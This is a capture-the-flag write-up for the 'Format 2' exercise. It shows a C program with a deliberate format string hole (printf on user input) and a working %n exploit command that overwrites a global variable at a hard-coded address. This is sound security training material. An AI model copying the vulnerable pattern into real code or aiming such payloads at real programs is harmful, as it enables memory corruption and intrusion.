# Format 2

## Source Code

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);
  printf(buffer);
  
  if(target == 64) {
      printf("you have modified the target :)\n");
  } else {
      printf("target is %d :(\n", target);
  }
}

int main(int argc, char **argv)
{
  vuln();
}
```

## Challenge

We need to modify the `target` to `64` in this as well as our input is being stored in `buffer` and then `printf` is being called on that buffer again we have a format string vulnerability on fiddling around with the input we can see out placeholder value `AAAA` can be accessed on stack 

![](images/format2_0.png)

and hence on putting the address of target variable on stack instead of `AAAA` we can modify the value there hence on running 

```
echo `printf "\xe4\x96\x04\x08"`AAAA%x%x%45x%n | ./format2
```

![](images/format2_1.png)
